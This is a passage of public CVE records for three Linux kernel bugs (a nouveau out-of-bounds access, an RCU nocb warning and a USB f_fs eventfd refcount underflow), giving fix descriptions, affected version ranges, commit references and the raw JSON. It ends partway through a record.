Affected: 2e5702aff39532662198459726c624d5eadbdd78 , < cf92bb778eda7830e79452c6917efa8474a30c1e (git)

Linux

Affected: 2.6.38
Unaffected: 0 , < 2.6.38 (semver)
Unaffected: 4.19.313 , ≤ 4.19.* (semver)
Unaffected: 5.4.275 , ≤ 5.4.* (semver)
Unaffected: 5.10.216 , ≤ 5.10.* (semver)
Unaffected: 5.15.157 , ≤ 5.15.* (semver)
Unaffected: 6.1.88 , ≤ 6.1.* (semver)
Unaffected: 6.6.29 , ≤ 6.6.* (semver)
Unaffected: 6.8.8 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-27008",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-28T17:53:02.936582Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:46:47.615Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T17:16:46.306Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c2b97f26f081ceec3298151481687071075a25cb"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5050ae879a828d752b439e3827aac126709da6d1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/097c7918fcfa1dee233acfd1f3029f00c3bc8062"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/df0991da7db846f7fa4ec6740350f743d3b69b04"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5fd4b090304e450aa0e7cc9cc2b4873285c6face"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6690cc2732e2a8d0eaca44dcbac032a4b0148042"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/26212da39ee14a52c76a202c6ae5153a84f579a5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cf92bb778eda7830e79452c6917efa8474a30c1e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DAMSOZXJEPUOXW33WZYWCVAY7Z5S7OOY/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EZ6PJW7VOZ224TD7N4JZNU6KV32ZJ53/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCBZZEC7L7KTWWAS2NLJK6SO3IZIL4WW/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/nouveau/nouveau_bios.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "c2b97f26f081ceec3298151481687071075a25cb",
              "status": "affected",
              "version": "2e5702aff39532662198459726c624d5eadbdd78",
              "versionType": "git"
            },
            {
              "lessThan": "5050ae879a828d752b439e3827aac126709da6d1",
              "status": "affected",
              "version": "2e5702aff39532662198459726c624d5eadbdd78",
              "versionType": "git"
            },
            {
              "lessThan": "097c7918fcfa1dee233acfd1f3029f00c3bc8062",
              "status": "affected",
              "version": "2e5702aff39532662198459726c624d5eadbdd78",
              "versionType": "git"
            },
            {
              "lessThan": "df0991da7db846f7fa4ec6740350f743d3b69b04",
              "status": "affected",
              "version": "2e5702aff39532662198459726c624d5eadbdd78",
              "versionType": "git"
            },
            {
              "lessThan": "5fd4b090304e450aa0e7cc9cc2b4873285c6face",
              "status": "affected",
              "version": "2e5702aff39532662198459726c624d5eadbdd78",
              "versionType": "git"
            },
            {
              "lessThan": "6690cc2732e2a8d0eaca44dcbac032a4b0148042",
              "status": "affected",
              "version": "2e5702aff39532662198459726c624d5eadbdd78",
              "versionType": "git"
            },
            {
              "lessThan": "26212da39ee14a52c76a202c6ae5153a84f579a5",
              "status": "affected",
              "version": "2e5702aff39532662198459726c624d5eadbdd78",
              "versionType": "git"
            },
            {
              "lessThan": "cf92bb778eda7830e79452c6917efa8474a30c1e",
              "status": "affected",
              "version": "2e5702aff39532662198459726c624d5eadbdd78",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/nouveau/nouveau_bios.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.38"
            },
            {
              "lessThan": "2.6.38",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.313",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.275",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.216",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.157",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.88",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.29",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.313",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.275",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.216",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.157",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.88",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.29",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.8",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm: nv04: Fix out of bounds access\n\nWhen Output Resource (dcb-\u003eor) value is assigned in\nfabricate_dcb_output(), there may be out of bounds access to\ndac_users array in case dcb-\u003eor is zero because ffs(dcb-\u003eor) is\nused as index there.\nThe \u0027or\u0027 argument of fabricate_dcb_output() must be interpreted as a\nnumber of bit to set, not value.\n\nUtilize macros from \u0027enum nouveau_or\u0027 in calls instead of hardcoding.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:02:03.592Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/c2b97f26f081ceec3298151481687071075a25cb"
        },
        {
          "url": "https://git.kernel.org/stable/c/5050ae879a828d752b439e3827aac126709da6d1"
        },
        {
          "url": "https://git.kernel.org/stable/c/097c7918fcfa1dee233acfd1f3029f00c3bc8062"
        },
        {
          "url": "https://git.kernel.org/stable/c/df0991da7db846f7fa4ec6740350f743d3b69b04"
        },
        {
          "url": "https://git.kernel.org/stable/c/5fd4b090304e450aa0e7cc9cc2b4873285c6face"
        },
        {
          "url": "https://git.kernel.org/stable/c/6690cc2732e2a8d0eaca44dcbac032a4b0148042"
        },
        {
          "url": "https://git.kernel.org/stable/c/26212da39ee14a52c76a202c6ae5153a84f579a5"
        },
        {
          "url": "https://git.kernel.org/stable/c/cf92bb778eda7830e79452c6917efa8474a30c1e"
        }
      ],
      "title": "drm: nv04: Fix out of bounds access",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-27008",
    "datePublished": "2024-05-01T05:29:13.312Z",
    "dateReserved": "2024-02-19T14:20:24.208Z",
    "dateUpdated": "2025-11-04T17:16:46.306Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-35929 (GCVE-0-2024-35929)

Vulnerability from cvelistv5 – Published: 2024-05-19 10:10 – Updated: 2025-12-06 04:14

Title

rcu/nocb: Fix WARN_ON_ONCE() in the rcu_nocb_bypass_lock()

Summary

In the Linux kernel, the following vulnerability has been resolved: rcu/nocb: Fix WARN_ON_ONCE() in the rcu_nocb_bypass_lock() For the kernels built with CONFIG_RCU_NOCB_CPU_DEFAULT_ALL=y and CONFIG_RCU_LAZY=y, the following scenarios will trigger WARN_ON_ONCE() in the rcu_nocb_bypass_lock() and rcu_nocb_wait_contended() functions: CPU2 CPU11 kthread rcu_nocb_cb_kthread ksys_write rcu_do_batch vfs_write rcu_torture_timer_cb proc_sys_write __kmem_cache_free proc_sys_call_handler kmemleak_free drop_caches_sysctl_handler delete_object_full drop_slab __delete_object shrink_slab put_object lazy_rcu_shrink_scan call_rcu rcu_nocb_flush_bypass __call_rcu_commn rcu_nocb_bypass_lock raw_spin_trylock(&rdp->nocb_bypass_lock) fail atomic_inc(&rdp->nocb_lock_contended); rcu_nocb_wait_contended WARN_ON_ONCE(smp_processor_id() != rdp->cpu); WARN_ON_ONCE(atomic_read(&rdp->nocb_lock_contended)) | |_ _ _ _ _ _ _ _ _ _same rdp and rdp->cpu != 11_ _ _ _ _ _ _ _ _ __| Reproduce this bug with "echo 3 > /proc/sys/vm/drop_caches". This commit therefore uses rcu_nocb_try_flush_bypass() instead of rcu_nocb_flush_bypass() in lazy_rcu_shrink_scan(). If the nocb_bypass queue is being flushed, then rcu_nocb_try_flush_bypass will return directly.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/4d58c9fb45c70e62c…
	https://git.kernel.org/stable/c/927d1f4f77e4784ab…
	https://git.kernel.org/stable/c/dda98810b552fc6bf…

Impacted products

Vendor

Product

Version

Linux

Affected: 7625926086765123251f765d91fc3a70617d334d , < 4d58c9fb45c70e62c19e8be3f3605889c47601bc (git)
Affected: 7625926086765123251f765d91fc3a70617d334d , < 927d1f4f77e4784ab3944a9df86ab14d1cd3185a (git)
Affected: 7625926086765123251f765d91fc3a70617d334d , < dda98810b552fc6bf650f4270edeebdc2f28bd3f (git)

Linux

Affected: 6.5
Unaffected: 0 , < 6.5 (semver)
Unaffected: 6.6.27 , ≤ 6.6.* (semver)
Unaffected: 6.8.6 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35929",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-23T19:21:22.724357Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:34:50.854Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:49.023Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4d58c9fb45c70e62c19e8be3f3605889c47601bc"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/927d1f4f77e4784ab3944a9df86ab14d1cd3185a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/dda98810b552fc6bf650f4270edeebdc2f28bd3f"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "kernel/rcu/tree_nocb.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "4d58c9fb45c70e62c19e8be3f3605889c47601bc",
              "status": "affected",
              "version": "7625926086765123251f765d91fc3a70617d334d",
              "versionType": "git"
            },
            {
              "lessThan": "927d1f4f77e4784ab3944a9df86ab14d1cd3185a",
              "status": "affected",
              "version": "7625926086765123251f765d91fc3a70617d334d",
              "versionType": "git"
            },
            {
              "lessThan": "dda98810b552fc6bf650f4270edeebdc2f28bd3f",
              "status": "affected",
              "version": "7625926086765123251f765d91fc3a70617d334d",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "kernel/rcu/tree_nocb.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.5"
            },
            {
              "lessThan": "6.5",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.27",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.27",
                  "versionStartIncluding": "6.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.6",
                  "versionStartIncluding": "6.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "6.5",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nrcu/nocb: Fix WARN_ON_ONCE() in the rcu_nocb_bypass_lock()\n\nFor the kernels built with CONFIG_RCU_NOCB_CPU_DEFAULT_ALL=y and\nCONFIG_RCU_LAZY=y, the following scenarios will trigger WARN_ON_ONCE()\nin the rcu_nocb_bypass_lock() and rcu_nocb_wait_contended() functions:\n\n        CPU2                                               CPU11\nkthread\nrcu_nocb_cb_kthread                                       ksys_write\nrcu_do_batch                                              vfs_write\nrcu_torture_timer_cb                                      proc_sys_write\n__kmem_cache_free                                         proc_sys_call_handler\nkmemleak_free                                             drop_caches_sysctl_handler\ndelete_object_full                                        drop_slab\n__delete_object                                           shrink_slab\nput_object                                                lazy_rcu_shrink_scan\ncall_rcu                                                  rcu_nocb_flush_bypass\n__call_rcu_commn                                            rcu_nocb_bypass_lock\n                                                            raw_spin_trylock(\u0026rdp-\u003enocb_bypass_lock) fail\n                                                            atomic_inc(\u0026rdp-\u003enocb_lock_contended);\nrcu_nocb_wait_contended                                     WARN_ON_ONCE(smp_processor_id() != rdp-\u003ecpu);\n WARN_ON_ONCE(atomic_read(\u0026rdp-\u003enocb_lock_contended))                                          |\n                            |_ _ _ _ _ _ _ _ _ _same rdp and rdp-\u003ecpu != 11_ _ _ _ _ _ _ _ _ __|\n\nReproduce this bug with \"echo 3 \u003e /proc/sys/vm/drop_caches\".\n\nThis commit therefore uses rcu_nocb_try_flush_bypass() instead of\nrcu_nocb_flush_bypass() in lazy_rcu_shrink_scan().  If the nocb_bypass\nqueue is being flushed, then rcu_nocb_try_flush_bypass will return\ndirectly."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-12-06T04:14:33.615Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/4d58c9fb45c70e62c19e8be3f3605889c47601bc"
        },
        {
          "url": "https://git.kernel.org/stable/c/927d1f4f77e4784ab3944a9df86ab14d1cd3185a"
        },
        {
          "url": "https://git.kernel.org/stable/c/dda98810b552fc6bf650f4270edeebdc2f28bd3f"
        }
      ],
      "title": "rcu/nocb: Fix WARN_ON_ONCE() in the rcu_nocb_bypass_lock()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35929",
    "datePublished": "2024-05-19T10:10:38.388Z",
    "dateReserved": "2024-05-17T13:50:33.129Z",
    "dateUpdated": "2025-12-06T04:14:33.615Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2021-46933 (GCVE-0-2021-46933)

Vulnerability from cvelistv5 – Published: 2024-02-27 09:44 – Updated: 2025-05-04 07:00

Title

usb: gadget: f_fs: Clear ffs_eventfd in ffs_data_clear.

Summary

In the Linux kernel, the following vulnerability has been resolved: usb: gadget: f_fs: Clear ffs_eventfd in ffs_data_clear. ffs_data_clear is indirectly called from both ffs_fs_kill_sb and ffs_ep0_release, so it ends up being called twice when userland closes ep0 and then unmounts f_fs. If userland provided an eventfd along with function's USB descriptors, it ends up calling eventfd_ctx_put as many times, causing a refcount underflow. NULL-ify ffs_eventfd to prevent these extraneous eventfd_ctx_put calls. Also, set epfiles to NULL right after de-allocating it, for readability. For completeness, ffs_data_clear actually ends up being called thrice, the last call being before the whole ffs structure gets freed, so when this specific sequence happens there is a second underflow happening (but not being reported): /sys/kernel/debug/tracing# modprobe usb_f_fs /sys/kernel/debug/tracing# echo ffs_data_clear > set_ftrace_filter /sys/kernel/debug/tracing# echo function > current_tracer /sys/kernel/debug/tracing# echo 1 > tracing_on (setup gadget, run and kill function userland process, teardown gadget) /sys/kernel/debug/tracing# echo 0 > tracing_on /sys/kernel/debug/tracing# cat trace smartcard-openp-436 [000] ..... 1946.208786: ffs_data_clear <-ffs_data_closed smartcard-openp-431 [000] ..... 1946.279147: ffs_data_clear <-ffs_data_closed smartcard-openp-431 [000] .n... 1946.905512: ffs_data_clear <-ffs_data_put Warning output corresponding to above trace: [ 1946.284139] WARNING: CPU: 0 PID: 431 at lib/refcount.c:28 refcount_warn_saturate+0x110/0x15c [ 1946.293094] refcount_t: underflow; use-after-free. [ 1946.298164] Modules linked in: usb_f_ncm(E) u_ether(E) usb_f_fs(E) hci_uart(E) btqca(E) btrtl(E) btbcm(E) btintel(E) bluetooth(E) nls_ascii(E) nls_cp437(E) vfat(E) fat(E) bcm2835_v4l2(CE) bcm2835_mmal_vchiq(CE) videobuf2_vmalloc(E) videobuf2_memops(E) sha512_generic(E) videobuf2_v4l2(E) sha512_arm(E) videobuf2_common(E) videodev(E) cpufreq_dt(E) snd_bcm2835(CE) brcmfmac(E) mc(E) vc4(E) ctr(E) brcmutil(E) snd_soc_core(E) snd_pcm_dmaengine(E) drbg(E) snd_pcm(E) snd_timer(E) snd(E) soundcore(E) drm_kms_helper(E) cec(E) ansi_cprng(E) rc_core(E) syscopyarea(E) raspberrypi_cpufreq(E) sysfillrect(E) sysimgblt(E) cfg80211(E) max17040_battery(OE) raspberrypi_hwmon(E) fb_sys_fops(E) regmap_i2c(E) ecdh_generic(E) rfkill(E) ecc(E) bcm2835_rng(E) rng_core(E) vchiq(CE) leds_gpio(E) libcomposite(E) fuse(E) configfs(E) ip_tables(E) x_tables(E) autofs4(E) ext4(E) crc16(E) mbcache(E) jbd2(E) crc32c_generic(E) sdhci_iproc(E) sdhci_pltfm(E) sdhci(E) [ 1946.399633] CPU: 0 PID: 431 Comm: smartcard-openp Tainted: G C OE 5.15.0-1-rpi #1 Debian 5.15.3-1 [ 1946.417950] Hardware name: BCM2835 [ 1946.425442] Backtrace: [ 1946.432048] [<c08d60a0>] (dump_backtrace) from [<c08d62ec>] (show_stack+0x20/0x24) [ 1946.448226] r7:00000009 r6:0000001c r5:c04a948c r4:c0a64e2c [ 1946.458412] [<c08d62cc>] (show_stack) from [<c08d9ae0>] (dump_stack+0x28/0x30) [ 1946.470380] [<c08d9ab8>] (dump_stack) from [<c0123500>] (__warn+0xe8/0x154) [ 1946.482067] r5:c04a948c r4:c0a71dc8 [ 1946.490184] [<c0123418>] (__warn) from [<c08d6948>] (warn_slowpath_fmt+0xa0/0xe4) [ 1946.506758] r7:00000009 r6:0000001c r5:c0a71dc8 r4:c0a71e04 [ 1946.517070] [<c08d68ac>] (warn_slowpath_fmt) from [<c04a948c>] (refcount_warn_saturate+0x110/0x15c) [ 1946.535309] r8:c0100224 r7:c0dfcb84 r6:ffffffff r5:c3b84c00 r4:c24a17c0 [ 1946.546708] [<c04a937c>] (refcount_warn_saturate) from [<c0380134>] (eventfd_ctx_put+0x48/0x74) [ 1946.564476] [<c03800ec>] (eventfd_ctx_put) from [<bf5464e8>] (ffs_data_clear+0xd0/0x118 [usb_f_fs]) [ 1946.582664] r5:c3b84c00 r4:c2695b00 [ 1946.590668] [<bf546418>] (ffs_data_clear [usb_f_fs]) from [<bf547cc0>] (ffs_data_closed+0x9c/0x150 [usb_f_fs]) [ 1946.609608] r5:bf54d014 r4:c2695b00 [ 1946.617522] [<bf547c24>] (ffs_data_closed [usb_f_fs]) from [<bf547da0>] (ffs_fs_kill_sb+0x2c/0x30 [usb_f_fs]) [ 1946.636217] r7:c0dfcb ---truncated---

Severity ?

5.5 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-476 - NULL Pointer Dereference

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/f976dd7011150244a…
	https://git.kernel.org/stable/c/cc8c8028c21b2a384…
	https://git.kernel.org/stable/c/52500239e3f2d6fc7…
	https://git.kernel.org/stable/c/33f6a0cbb7772146e…
	https://git.kernel.org/stable/c/240fc586e83d64591…
	https://git.kernel.org/stable/c/1c4ace3e6b8575745…
	https://git.kernel.org/stable/c/ebef2aa29f370b509…
	https://git.kernel.org/stable/c/b1e0887379422975f…

Impacted products

Vendor

Product

Version

Linux

Affected: 5e33f6fdf735cda1d4580fe6f1878da05718fe73 , < f976dd7011150244a7ba820f2c331e9fb253befa (git)
Affected: 5e33f6fdf735cda1d4580fe6f1878da05718fe73 , < cc8c8028c21b2a3842a1e98e99e55028df275919 (git)
Affected: 5e33f6fdf735cda1d4580fe6f1878da05718fe73 , < 52500239e3f2d6fc77b6f58632a9fb98fe74ac09 (git)
Affected: 5e33f6fdf735cda1d4580fe6f1878da05718fe73 , < 33f6a0cbb7772146e1c11f38028fffbfed14728b (git)
Affected: 5e33f6fdf735cda1d4580fe6f1878da05718fe73 , < 240fc586e83d645912accce081a48aa63a45f6ee (git)
Affected: 5e33f6fdf735cda1d4580fe6f1878da05718fe73 , < 1c4ace3e6b8575745c50dca9e76e0021e697d645 (git)
Affected: 5e33f6fdf735cda1d4580fe6f1878da05718fe73 , < ebef2aa29f370b5096c16020c104e393192ef684 (git)
Affected: 5e33f6fdf735cda1d4580fe6f1878da05718fe73 , < b1e0887379422975f237d43d8839b751a6bcf154 (git)

Linux

Affected: 4.0
Unaffected: 0 , < 4.0 (semver)
Unaffected: 4.4.298 , ≤ 4.4.* (semver)
Unaffected: 4.9.296 , ≤ 4.9.* (semver)
Unaffected: 4.14.261 , ≤ 4.14.* (semver)
Unaffected: 4.19.224 , ≤ 4.19.* (semver)
Unaffected: 5.4.170 , ≤ 5.4.* (semver)
Unaffected: 5.10.90 , ≤ 5.10.* (semver)
Unaffected: 5.15.13 , ≤ 5.15.* (semver)
Unaffected: 5.16 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 5.5,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2021-46933",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-04-22T16:12:25.365291Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-476",
                "description": "CWE-476 NULL Pointer Dereference",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-04-22T16:12:28.882Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T05:17:43.071Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f976dd7011150244a7ba820f2c331e9fb253befa"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cc8c8028c21b2a3842a1e98e99e55028df275919"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/52500239e3f2d6fc77b6f58632a9fb98fe74ac09"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/33f6a0cbb7772146e1c11f38028fffbfed14728b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/240fc586e83d645912accce081a48aa63a45f6ee"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1c4ace3e6b8575745c50dca9e76e0021e697d645"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ebef2aa29f370b5096c16020c104e393192ef684"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b1e0887379422975f237d43d8839b751a6bcf154"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/usb/gadget/function/f_fs.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "f976dd7011150244a7ba820f2c331e9fb253befa",
              "status": "affected",
              "version": "5e33f6fdf735cda1d4580fe6f1878da05718fe73",
              "versionType": "git"
            },
            {
              "lessThan": "cc8c8028c21b2a3842a1e98e99e55028df275919",
              "status": "affected",
              "version": "5e33f6fdf735cda1d4580fe6f1878da05718fe73",
